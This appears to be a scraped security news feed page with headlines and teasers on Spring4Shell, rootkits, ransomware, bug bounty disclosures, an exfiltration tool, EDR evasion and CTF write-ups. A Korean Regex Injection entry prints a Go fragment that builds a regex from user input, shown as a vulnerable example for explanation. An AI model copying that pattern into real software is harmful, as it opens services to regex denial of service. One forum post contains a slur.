    CISA和DoE联合发布了关于减轻针对联网的不间断电源 (UPS) 设备的攻击指南,并向企业发出了相应的告警。
    Lapsus$勒索团伙声称攻击IT巨头Globant
    近日,勒索团伙Lapsus$声称其侵入了IT巨头Globant公司,并在网络上泄露了大约70GB的被盗数据。
    监控软件公司 FinFisher 宣布破产
    总部位于慕尼黑的间谍软件公司FinFisher已于上个月宣布破产,有关部门正对其业务交易进行调查。
    纽约82万名学生的个人数据被曝光
    近期,纽约一个广泛使用的在线评分和考勤系统遭到黑客攻击,这可能是美国历史上学生个人数据最大的一次曝光。犯罪分子于1月闯入Illuminate Education IT系统,并获得了约820,000名现任和前任纽约市公立学校学生个人数据的数据库的访问权限。Illuminate Education是一家位于加利福尼亚州的纳税人资助的软件公司。该公司创建了流行的IO Classroom、Skedula和
    部分本田车型存在漏洞,黑客可远程启动车辆
    黑客可通过本田漏洞重放攻击,解锁和启动车辆 。
    ​与智者同行,FreeBuf咨询TTSP智库专家公开招募火热开启
    即日起,TTSP安全智库公开招募火热开启,欢迎各位有心共同交流、学习,共同推动网络安全产业发展的网安人报名参加。
  • Open

    【Rootkit系列研究】Windows平台高隐匿、高持久化威胁(二)
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 序言...
    【Rootkit 系列研究】Rootkit 检测技术发展现状
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 摘要...
    【Rootkit 系列研究】Linux 平台的高隐匿、高持久化威胁
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 序言...
    针对企业用户的恶意 Word 文件
    译者:知道创宇404实验室翻译组 原文链接:https://asec.ahnlab.com/en/33186/ ASEC 研究团队发现一个 Word 文件,它似乎是针对企业用户的。该文件包含一个图像,提示用户启动类似恶意文件一样的宏。为了欺骗用户认为这是一个无害的文件,当宏运行时,它显示了与提高谷歌帐户安全性有关的信息。最终,它会下载额外的恶意软件文件并泄露用户信息。 当文件运行时,它会显示...
    【Rootkit 系列研究】Windows 平台的高隐匿、高持久化威胁
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 从西...
  • Open

    【Rootkit系列研究】Windows平台高隐匿、高持久化威胁(二)
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 序言...
    【Rootkit 系列研究】Rootkit 检测技术发展现状
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 摘要...
    【Rootkit 系列研究】Linux 平台的高隐匿、高持久化威胁
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 序言...
    针对企业用户的恶意 Word 文件
    译者:知道创宇404实验室翻译组 原文链接:https://asec.ahnlab.com/en/33186/ ASEC 研究团队发现一个 Word 文件,它似乎是针对企业用户的。该文件包含一个图像,提示用户启动类似恶意文件一样的宏。为了欺骗用户认为这是一个无害的文件,当宏运行时,它显示了与提高谷歌帐户安全性有关的信息。最终,它会下载额外的恶意软件文件并泄露用户信息。 当文件运行时,它会显示...
    【Rootkit 系列研究】Windows 平台的高隐匿、高持久化威胁
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 从西...
  • Open

    Effective Seed Scheduling for Fuzzing with Graph Centrality Analysis(S&P22)
    We use graph centrality scores to build a generic seed scheduler for LibFuzzer, AFL and concolic execution engine in QSYM. Check our paper at https://arxiv.org/abs/2203.12064. Our code and replication package are available at https://github.com/Dongdongshe/K-Scheduler. Comments URL: https://news.ycombinator.com/item?id=30863270 Points: 1 # Comments: 0
  • Open

    SpringShell: Spring Core RCE 0-day Vulnerability
    submitted by /u/Gorkha56 [link] [comments]

  • Open

    lunasec/2022-03-30-spring-core-rce
    submitted by /u/hackerboy69 [link] [comments]
    Spring Core on JDK9+ is vulnerable to remote code execution
    submitted by /u/ScottContini [link] [comments]
    Spring4Shell: Security Analysis of the latest Java RCE '0-day' vulnerabilities
    submitted by /u/freeqaz [link] [comments]
    Betabot in the Rearview Mirror
    submitted by /u/krabsonsecurity [link] [comments]
    Top 3 Stealer Malware Activity Research
    submitted by /u/mstfknn [link] [comments]
    [OC] Data Exfiltration using RedDrop - A Python Webserver for file and data exfiltration which automatically detects, decodes, decrypts, and transforms data.
    submitted by /u/cyberbutler [link] [comments]
    Threat Alert: First Python Ransomware Attack Targeting Jupyter Notebooks
    submitted by /u/esdaniel- [link] [comments]
    A few vulnerabilities discovered in Wyze Cam (CVE-2019-9564, CVE-2019-12266)
    submitted by /u/jaymzu [link] [comments]
    Decrypting your own HTTPS traffic with Wireshark
    submitted by /u/Quantum_Rage [link] [comments]
    Cisco Nexus Dashboard Fabric Controller unauth web-to-root shell
    submitted by /u/ChoiceGrapefruit0 [link] [comments]
    Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
    submitted by /u/Gallus [link] [comments]
    Spring Cloud Function SPEL Expression Injection Vulnerability Alert
    submitted by /u/Gallus [link] [comments]
  • Open

    EDRs & Shellcode Loaders
    In this post I have covered the basics of how EDR products work and also some ways to get around them (some source code included). Continue reading on Medium »
    Unsafe content loading [Electron JS]
    Phishing in misconfigured Electron apps Continue reading on Medium »
  • Open

    New Wave of AnonymousFox Cron Jobs
    Recently our Remediation and Research teams have noticed a new wave of malicious cron jobs associated with the notorious AnonymousFox malware. The cron jobs are purpose-built to reinfect the victim websites and make removal of the infection more cumbersome and time-consuming. In this post we’ll investigate one of these malicious cron jobs, describe what it does and how you can recognise and remove them on your website. If you’re currently dealing with such a hack you can check out our extensive AnonymousFox Hack Guide here for help with removing the infection from your environment. Continue reading New Wave of AnonymousFox Cron Jobs at Sucuri Blog.
  • Open

    Try hack me: Sakura Room
    OSINT meydan okuması Continue reading on Medium »
    Ukraine — Point de situation au 31 mars
    Les dernières 24h Continue reading on Medium »
    War in Ukraine / March 29
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
  • Open

    ihsinme: CPP Add a query to find incorrectly used exceptions.
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1455531 - Bounty: $1000
    [Python]: Add shutil module sinks for path injection query
    GitHub Security Lab disclosed a bug submitted by jessforfun: https://hackerone.com/reports/1471622 - Bounty: $1000
    Java: An experimental query for ignored hostname verification
    GitHub Security Lab disclosed a bug submitted by artem: https://hackerone.com/reports/1481247 - Bounty: $1800
    [Java]: CWE-073 - File path injection with the JFinal framework
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1483918 - Bounty: $1800
    CPP: Add query for CWE-266 Incorrect Privilege Assignment
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1483919 - Bounty: $1800
    [C#] CWE-759: Query to detect password hash without a salt
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1484086 - Bounty: $1800
    Java : Add query to detect Server Side Template Injection (SSTI)
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1490372 - Bounty: $1800
    Python: CWE-338 insecureRandomness
    GitHub Security Lab disclosed a bug submitted by museljh: https://hackerone.com/reports/1490400 - Bounty: $1800
    [Java]: Timing attacks while comparing the headers value
    GitHub Security Lab disclosed a bug submitted by farid_hunter: https://hackerone.com/reports/1496268 - Bounty: $1000
    [Java]: Add JDBC connection SSRF sinks
    GitHub Security Lab disclosed a bug submitted by p0wn4j: https://hackerone.com/reports/1512936 - Bounty: $1800
    [Python]: CWE-611: XXE
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1512937 - Bounty: $1800
    CPP: Add query for CWE-377 Insecure Temporary File
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1515139 - Bounty: $1000
    [Java]: CWE-200 - Query to detect insecure WebResourceResponse implementation
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1526609 - Bounty: $1800
    Upload Profile Photo in any folder you want with any extension you want
    Stripo Inc disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/753375
    Insecure Storage and Overly Permissive API Keys
    Stripo Inc disclosed a bug submitted by andformod: https://hackerone.com/reports/1283575
    Ability to use premium templates as free user via https://stripo.email/templates/?utm_source=viewstripo&utm_medium=referral
    Stripo Inc disclosed a bug submitted by 0xkira: https://hackerone.com/reports/1166993
  • Open

    Tool for Chromebook forensic acquisition
    Do anyone know of a tool that I can use for Chromebook forensic acquisition (K-12 environment). The company Magnet Forensics had such a tool, but they no longer support it. submitted by /u/1682aggie [link] [comments]
    cyber triage vs magnet axiom cyber
    I get Axiom's analysis might be a little better/different. But in terms of remote triage what's the difference? Is one cheaper? submitted by /u/CrazyKitty2016 [link] [comments]
    The Truth About USB Device Serial Numbers
    submitted by /u/shelbpresc [link] [comments]
  • Open

    What are some RPOs for popular compliance standards?
    Also, how does your company determine its Recovery Point Objectives? submitted by /u/CitizenJosh [link] [comments]
    How to validate Dom xss via via scripts
    Hey everyone. I've been around for a while but have avoided certain topics like the plague. Dom xss is one of those but today I watched a video on it that recommended reviewing the pages code and going through that method to discover Dom xss. Now to be clear what brought this on was a finding in burp, it's flagging on a JS file and from there location.hash data being passed to an element/value. What I could use some help with is understanding this type of Dom xss and how to validate this. I'm tired of not understanding this. My thought is that this js file has a vulnerable function and I should be looking for this function in use in the application somewhere. Oh also I'm not the most intelligent person and have no real experience with Javascript so it may be necessary to dumb some things down. And if there's a video that talks about this I would appreciate it. All the ones I've seen just show document.write directly in the web page not in a script. submitted by /u/realKevinNash [link] [comments]
    How to document access request workflows?
    A common problem is that people new in an organization don't know how to get access to certain systems. Are there known best practices how to help people orient themselves what access they need to request to achieve a certain task? E.g. I want to access system ABC, therefore I need role "ABC user" and should raise this request with "ABC admins" who can be found here: "[xyz@example.com](mailto:xyz@example.com)" submitted by /u/soroyaya [link] [comments]
    Mandatory Access Control Frameworks
    Hi, I want to improve on my rather rudimentary knowledge of MAC Frameworks (SELinux, AppArmour). Can you point me to learning material/courses that you have had good experience with? submitted by /u/turingtest1 [link] [comments]
    I am using burp suite to intercept traffic from a site, I am trying to view the images from the proxy but the site uses web sockets to send all the images Data URIs (Base64) at once to be loaded on Demand Which is called "Lazy-Loading" , Alternatively How do i get Driftnet to work on Data URIs ?
    Can Lazy Loading be considered some sort of protection against tools that sniff images over network like Driftnet ? Image of the burp and the data Thanks a lot submitted by /u/theycallmemonlight [link] [comments]
  • Open

    Possible New Java Spring Framework Vulnerability (Updated: Not a Spring Problem)
    Article URL: https://isc.sans.edu/diary/Possible+new+Java+Spring+Framework+Vulnerability+%28Updated%3A+not+a+Spring+problem%29/28498 Comments URL: https://news.ycombinator.com/item?id=30858065 Points: 2 # Comments: 0
  • Open

    Going Through FBI's "Oversight of the FBI Cyber Division" Testimony
    The FBI has recently released its "Oversight of the FBI Cyber Division" in the form of a testimony which offers quite an important peek inside the FBI's understanding of current and emerging cyber threats including an understanding of its situational awareness in the world of cybercrime and cyber related fraud and threats.An excerpt:"The most significant nation-state threats we face are those
    The FCC Adds Kaspersky to Its List of National Security Threats
    The FCC has recently added Kaspersky products to it's list of National Security Threats while the company publicly issued a statement claiming that the decision was made on political grounds. The company also cited yet another decision by the U.S DHS back in 2017 which basically forbids U.S based companies from doing business with the company. In the past I've discussed how central antivirus
    Courtesy of Republic of Bulgaria! - Part Five
    In the deepest and ugliest and most disgusting corners of the universal irrelevance of the universe known as dipshit land savage land peasant land there's a universal dipshit known as? Guess what? I won't tell you and best of all you don't have to guess for yourself. Don't bother. Related posts:Courtesy of Republic of Bulgaria! - Part FourCourtesy of Republic of Bulgaria! - Part ThreeCourtesy of
  • Open

    SecWiki News 2022-03-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Shellcode as User Input | Off Topic if I may
    submitted by /u/C0DEV3IL [link] [comments]
    Whitepaper – Double Fetch Vulnerabilities in C and C++
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Unsafe content loading [Electron JS]
    Phishing in misconfigured Electron apps Continue reading on Medium »
    My Pentest Log -12- (Out-Of-Band Sql Injection in MySQL)
    Greetings to everyone from Byzantion, Continue reading on Medium »
    Universe Finance x Immunefi: Bug Bounty Program
    Dear spacemen, Continue reading on Medium »
    How I was able collect PII of all users
    Hello Folks 👋, Continue reading on Medium »
  • Open

    Unintended root(s) on Fortress
    No content preview
    Browser-in-the Browser (BITB) — A New Born Phishing Methodology
    No content preview
    eCTHPv2 Certification Experience
    No content preview
    eJPT Journey
    No content preview
    TryHackMe: Aratus
    No content preview
    TryHackMe writeup: IDE
    No content preview
    Analyze your gau result with Gau-Expose Tool
    No content preview
  • Open

    Unintended root(s) on Fortress
    No content preview
    Browser-in-the Browser (BITB) — A New Born Phishing Methodology
    No content preview
    eCTHPv2 Certification Experience
    No content preview
    eJPT Journey
    No content preview
    TryHackMe: Aratus
    No content preview
    TryHackMe writeup: IDE
    No content preview
    Analyze your gau result with Gau-Expose Tool
    No content preview
  • Open

    Unintended root(s) on Fortress
    No content preview
    Browser-in-the Browser (BITB) — A New Born Phishing Methodology
    No content preview
    eCTHPv2 Certification Experience
    No content preview
    eJPT Journey
    No content preview
    TryHackMe: Aratus
    No content preview
    TryHackMe writeup: IDE
    No content preview
    Analyze your gau result with Gau-Expose Tool
    No content preview
  • Open

    Notion as a platform for offensive operations
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Simplifying Your Operational Threat Hunt Planning
    Opening Hopefully you all were able to read our recent Threat Hunting whitepaper and had the chance to listen to our latest Threat Hunting webinar. These references should be used as the foundation of information, which leads us into the next journey: how to build out your first Threat Hunt. Building out an organization’s Threat... The post Simplifying Your Operational Threat Hunt Planning appeared first on TrustedSec.
  • Open

    一张图看懂全球最新DDoS攻击趋势
    一张图看懂全球最新DDoS攻击趋势。
    一张图看懂全球最新DDoS攻击趋势
    一张图看懂全球最新DDoS攻击趋势。
    “透明部落”APT组织正在大肆攻击印度官员
    具有巴基斯坦国家背景的,名为透明部落的APT组织,正在利用CrimsonRAT远程访问木马大肆发起网络攻击活动,目标直指印度官员。
    FreeBuf早报 | 透明部落组织对印度官员发起攻击;华盛顿卫生区再遭数据泄露
    华盛顿州的一个卫生区发布了 2022 年的第二次数据泄露公告。
    Shutterfly 因遭Conti 勒索软件攻击后被泄露数据
    近期,在线零售和摄影制造平台Shutterfly在遭遇Conti勒索软件攻击后被泄露了员工信息。这是一家为客户、企业,甚至包括为Shutterfly.com、BorrowLenses、GrooveBook、Snapfish 和 Lifetouch在内的品牌提供摄影服务的公司。Shutterfly最近披露由于勒索软件攻击,其网络于2021年12月3日遭到入侵。在勒索软件攻击期间,威胁参与者会获得对公
    部分 WordPress 网站被注入脚本,对乌克兰发起 DDoS 攻击
    被攻击的网站主要包括乌克兰政府机构、乌克兰国际军团的招募网站、金融网站和其他亲乌克兰网站。
    史上最大的加密黑客攻击诞生:Axi Infinity侧链 Ronin bridge被盗6.25亿美元
    近日,攻击者从Axi Infinity的侧链 Ronin 跨链桥窃取了价值近6.25亿美元的以太坊和USDC。
    以轻松赚钱为由,黑客每天发送近 4000 封虚假求职邀约邮件
    Proofpoint发布报告,指出一黑客团伙利用电子邮件散布虚假的求职邀约,不仅窃取用户个人数据信息,还诱导受害者进行洗钱活动。
    漏洞情报 | Spring 框架远程命令执行漏洞预警
    3月29日,Spring框架曝出RCE 0day漏洞。使用JDK9及以上版本皆有可能受到影响。
  • Open

    【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑
    作者:深信服千里目实验室 序言 APT,全称Advanced Persistent Threat,又名高级持续性威胁,往往有地区或政治背景,以情报搜集、破坏、或经济利益为目的,攻击环节可能使用各类社工、打点和内网渗透以及0day漏洞利用,作为一种非对称的攻击手段,往往能为攻击组织背后的政治或经济实体带来意想不到的地缘、情报、经济甚至军事利益或战术优势。 APT攻击的检测、溯源与反制,往往代表...
  • Open

    【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑
    作者:深信服千里目实验室 序言 APT,全称Advanced Persistent Threat,又名高级持续性威胁,往往有地区或政治背景,以情报搜集、破坏、或经济利益为目的,攻击环节可能使用各类社工、打点和内网渗透以及0day漏洞利用,作为一种非对称的攻击手段,往往能为攻击组织背后的政治或经济实体带来意想不到的地缘、情报、经济甚至军事利益或战术优势。 APT攻击的检测、溯源与反制,往往代表...

  • Open

    Windows freaking XP
    I may need to expose a windows XP machine to the internet, although I am fighting it, a battle maybe lost. Our corp AV doesnt support XP nor will it get patched. Any suggestions on protecting it. Would a proxy server give me enough protection, specifically a NGFW acting in proxy mode with the XP machine ring fenced to hell. Doesnt directly expose the machine to the web but not sure it will give the protection I am hoping for. NGFW will also do IPS, Deep inspection etc... Edit: thanks for the follow up all, an interesting read in the replies and some good feedback on options. I talked the management out of giving it internet access. This is an OT network with little option of changing OS as the tools/apps support only XP. OT networking is woeful at times and very real for those saying stop using XP. For those interested isolated pvlan behind my FW with only one "DMZ" jumpbox given inbound access to allow remote app support with MFA and identity based rules for access to Jumpbox, copy/paste and file transfer disabled as much as i can between the two, and only a strict select and trusted few have access to JB. Data transfers are controlled via a manual process with scrubbed USB stick using a buffer device to scan before transferring data. submitted by /u/watty_123 [link] [comments]
    Questions about using public wifi
    Let's say I am at an apartment, on the plane, etc. where I am using public wifi with VPN: Is it safe to use whatsapp, facebook etc? Im just thinking, when I use whatsapp or facebook app, I dont really enter any info/PIN/password at all, so it should be safe, right? Banking apps that require you to enter pin number. Is it safe to do this while on public wifi? Will the VPN help against this? Even if I visit websites, if those websites use HTTPS, shouldn't I be safe? submitted by /u/AliveandDrive [link] [comments]
    eJPT Cert exam
    I have been thinking of taking the eJPT cert but I want to properly learn, so does anyone know of some resources to prepare for the test or tips as well? submitted by /u/Mokushi99 [link] [comments]
    How to study SANS labs?
    Currently indexing and working through the SEC504 / GCIH labs. Aside for working through the each lab multiple times, anyone have methods to drill the labs into your brain? Not sure if indexing the 450p workbook is with the time. Thanks in advance! submitted by /u/Vassar_Bashing [link] [comments]
    How can I make a switch from DevOps to security oriented roles?
    Hi, I started out as a developer, then I got into Cloud and automation, and I loved it very much. Cloud infrastructure automation felt like playing with Lego bricks - fitting all the right cloud services together and making someone else's job easier. I have 5 years of total experience in IT. But recently I moved into a DevOps role (if I could even call that) - and I was told that I will be working on Terraform scripts, migrating apps from on-premises, but few months into the job, I found that it is anything but that. I feel like I don't really have a core skill anymore, no identity, and feel like an imposter. My dream since the beginning was to get into security and I thought getting my hands dirty in DevOps and infrastructure related roles would help me get there, but now I do miscella…
    Higher Studies for Cyber Security
    Hi guys. A Quick thing. I am changing my career path to CyberSecurity because I always wanted to be in that but never got the chance to do so because of Financial Issues. But now I got all the stuff that I need to pursue my dream. I am 27 years old and I know I am not that late to start from scratch. So for my studies, I thought of starting from Network Engineering Diploma, HND in Network Engineering, and then BSc in Ethical Hacking and Network Security. Do you guys think this is the right path to go for or is there another path I should follow? My main target is to be in the Defense (Blue Team) side of CS. But I want to learn Pentesting as well which I though to myself doing it alone and getting help from professionals in the field. But my worry is about my studies. Please help . :) submitted by /u/PapadumSriLanka [link] [comments]
    Encrypted android->jabber (laptop) messaging?
    Basically I have a friend who isn't technically proficient, and I want him to communicate securely with me. He's too retarded to learn how to use encryption etc. After a quick steup with him, physically next to me, on his phone, what can I install on tails to communicate? Is there a standalone android app that will connect to TAILS with him? Also what stops google's keyboard from storing keystrokes? submitted by /u/sohna2 [link] [comments]
    ACSC (Aus) 'Essential Eight' benchmark scanner: Do these exist for on-device scanning (like OpenSCAP can for Stig)?
    I'd love to use a tool that can mark against Essential Eight controls at different maturity levels. Everyone seems to just self-assess manually, but many can be queried with powershell modules, wmi etc. Google results are very limited for Aus-relevant security scanners. submitted by /u/L3T [link] [comments]
    Just got a life changing salary by switching job
    I cannot hold my happiness anymore and I have nobody in my entourage that I can talk about money and career but I just got a new high paying job! If you check my post history, I was a bit concerned about my salary of 60k in Montreal. Now I accepted an offer of 93k (TC of 105k) for a Security Analyst role in the financial industry and to be honest, it's a life changing salary for me. I never imagined having this kind of salary after 2 years out of college. Still living at my parents place and never got a high salary like this. I know is not r/personalfinance but what is the best advice you can give to a young professional like me ? Thanks! submitted by /u/gateau_a_la_creme [link] [comments]
    First day of internship tomorrow
    Hello, So recently i graduated from MIS and i was taking some time off . Doing ctfs on htb,learning basic networks (protocols,routing,vpns ,etc..) till we recently discovered a neighbour who works in IT . I talked with him about an internship for me and he agreed after seeing my CV. His company works in Cloud and IT solutions. I told him that i am more interested in the security part and he told me he can give me access to courses about Fortigate,Palo alto,and he will let me interact with customers more. There jobs has to do with networks a lot and i felt there is room for learning network security . At least i can change my starus on Linkedin to Network security intern . But they also heavily work in cloud and Azure. I am really nervous. I feel like I am going to fuck shit up tomorrow and end up being a clown. I don’t want also to feel subconscious because I didn’t get it 100% from my skills but there is a connection. I am scared this internship will has nothing to do with security but I need internship to fill my resume. I guess tomorrow we will find out . I feel like that i am going to end up smoking before meeting them and blow the whole thing up and go back to testing Websites using Burp for SSRF and XSS. (Without any luck) submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    Swappi Testnet publica y recompensas por errores
    Prueba Swappi y gana recompensas. ¡Hasta 100.000 $PPI de recompensa! Continue reading on Conflux en español »
    HTTP Header Injection
    What is HTTP Header Injection? Continue reading on CodeX »
    nothing
    Continue reading on Medium »
    How I bypassed 403 forbidden domain using a simple trick
    Hello hunters, Continue reading on Medium »
    How I Accidentally Prevented A Mass Hacking
    Not all heroes wear a cape or get pay for their work Continue reading on Geek Culture »
  • Open

    Top 5 Topics to Discuss with Clients About Website Security
    If you’re a website developer or server administrator it’s always a good idea to inform your clients about the basics in terms of their website’s security, and the inherent need for cautious security practices. Attacks and the methods of gaining access to a web server are always evolving, so it’s always in a client’s best interest to remain aware of the potential risks that come along with owning their website. Of course, these should be considered by all website owners and not limited to just the site administrators or developers, however. Continue reading Top 5 Topics to Discuss with Clients About Website Security at Sucuri Blog.
  • Open

    Go Fuzzing
    Article URL: https://go.dev/doc/fuzz/ Comments URL: https://news.ycombinator.com/item?id=30848235 Points: 1 # Comments: 0
  • Open

    Ukraine — Point de situation au 30 mars
    Les dernières 24h Continue reading on Medium »
    War in Ukraine / March 28
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    War in Ukraine / March 27
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    War in Ukraine / March 26
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    Factchecking. Bombing of the children’s hospital and maternity hospital in Mariupol
    Our investigation revealed lots of factual errors in the claims of the Russian propaganda media. Continue reading on Medium »
    Open-Source Intelligence — the Low Down
    The whos, hows and whens of emergent information gathering systems in geopolitics and warfare. It’s not all secret these days is it when… Continue reading on The Dock on the Bay »
    My first Trace labs CTF
    Today was the day, I woke up at 0730 had my coffee and checked my email, what did I find, another confirmation email from Human Decoded… Continue reading on Medium »
  • Open

    Identify the mobile number of a twitter user
    Twitter disclosed a bug submitted by aymen_mansour: https://hackerone.com/reports/1225164 - Bounty: $560
    2 click Remote Code execution in Evernote Android
    Evernote disclosed a bug submitted by hulkvision_: https://hackerone.com/reports/1377748 - Bounty: $750
  • Open

    pync - Netcat for Python
    submitted by /u/brenw0rth [link] [comments]
    Digital Forensics Basics: A Practical Guide for Kubernetes DFIR
    submitted by /u/MiguelHzBz [link] [comments]
    Linux kernel CVE-2022-1015,CVE-2022-1016 in nf_tables cause privilege escalation
    submitted by /u/Gallus [link] [comments]
    Busyloop in curl
    submitted by /u/RegularHumanoid [link] [comments]
    Ruby Deserialization - New Gadget Chain for Ruby on Rails
    submitted by /u/Gallus [link] [comments]
  • Open

    [OC] Data Exfiltration using RedDrop - A Python Webserver for file and data exfiltration which automatically detects, decodes, decrypts, and transforms data.
    submitted by /u/cyberbutler [link] [comments]
    ABC-Code Execution for Veeam - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
    Analyzing Docker Image for Retrieving Secrets
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Data Exfiltration using RedDrop
    Introducing RedDrop — a quick and easy web server for capturing and processing encoded and encrypted payloads and tar archives. Continue reading on Maveris Labs »
    How to Write an Effective Pentest Report: 5 Key Sections
    As a pentester, you play a critical role in helping to secure an organization’s infrastructure, assets, and data from bad actors. While… Continue reading on Medium »
    How Clubhouse user scraping and social graphs
    TL;DR During this RedTeam testing, we used Clubhouse as a social engineering tool to find out more about our client’s employees. Continue reading on Medium »
    Reading Windows Sticky Notes
    Sticky Notes has been part of Windows since at least Windows 7. For those who aren’t familiar with it, Sticky Notes allows the user to add… Continue reading on Medium »
  • Open

    [Cullinan #30] Add ReDOS and Regex Injection
    컬리넌 로그 #30입니다. ReDOS와 Regex Injection을 추가했습니다. 그리고 XSS 내 CSP 우회에 대한 부분을 Bypass protection 하위 항목에서 별도로 Bypass CSP로 분리했습니다. 겸사겸사 누락됬던 우회 패턴도 추가했구요. 그리고 Defensive techniques에도 CSP 항목을 따로 만들어두었습니다. Add ReDOS Add Regex Injection Change XSS (Bypass CSP) Change XSS (Add CSP in Defensive techniques)
    Regex Injection
    🔍 Introduction Regex Injection은 공격자가 Regex가 compile 되기 전 regex 패턴에 영향을 줄 수 있는 Injection 공격을 의미합니다. Injection 공격으로 큰 영향력이 발생하는건 아니지만, 이를 통해 ReDOS를 쉽게 발생시킬 수 있습니다. 🗡 Offensive techniques Detect With Sourcecode 소스코드가 있다면 사용자 입력값이 정규표현식 문법에 영향을 주는지 체크하면 됩니다. 대표적으로 정규표현식 문법을 외부 파라미터로 생성하는 경우 이에 해당됩니다. Code 1 2 3 4 data := c.Param("user_data") body := c.Param("user_body") r, _ := regexp.
    ReDOS (Regex DOS)
    🔍 Introduction ReDOS는 정규표현식을 사용자로부터 입력받을 때 발생할 수 있는 보안 문제입니다. 일반적으로 ReDOS, Regex DOS 등으로 불리며 자체적으로 반복되는 그룹화 정규식과 정규식 검증 로직을 만족하는 대량의 문자 등을 이용해서 한번의 웹 요청으로 서비스의 가용성을 떨어뜨리는 방법입니다. 이러한 ReDOS는 Regexp 엔진이 Backtracking 기능을 사용할 때 발생하며 이 기능은 정규표현식 처리 시 가능한 모든 경로를 탐색하기 위해 비 효율적인 작업을 여러번 시도하게 됩니다. 이로인해 시스템의 자원을 고갈시키며 DOS를 수행할 수 있습니다.
  • Open

    Autopsy Cannot View Extracted Content In Results
    Hi. Im new to Autopsy, Im using the Windows version but I have also tried using it as a part of CAINE toolkit on a Linux VM, and I have the same problem. I am unable to view Extracted Content drop-down which should show interesting observations by the tool for this specific USB image file. It should also shows Web Artifacts which is absolutely crucial for this analysis. Do I need to download specific modules to view those results? Where do I get them from? I'd really appreciate any help in this regard. ​ Thanks. https://preview.redd.it/zujbu7eticq81.png?width=620&format=png&auto=webp&s=2a6e9fd19dd7fb96bb78e373ac792d08fb52966e submitted by /u/ResourceGlum6199 [link] [comments]
    Digital Forensics Basics: A Practical Guide for Kubernetes DFIR
    submitted by /u/MiguelHzBz [link] [comments]
    Is possible to transition from LE forensics to a business role?
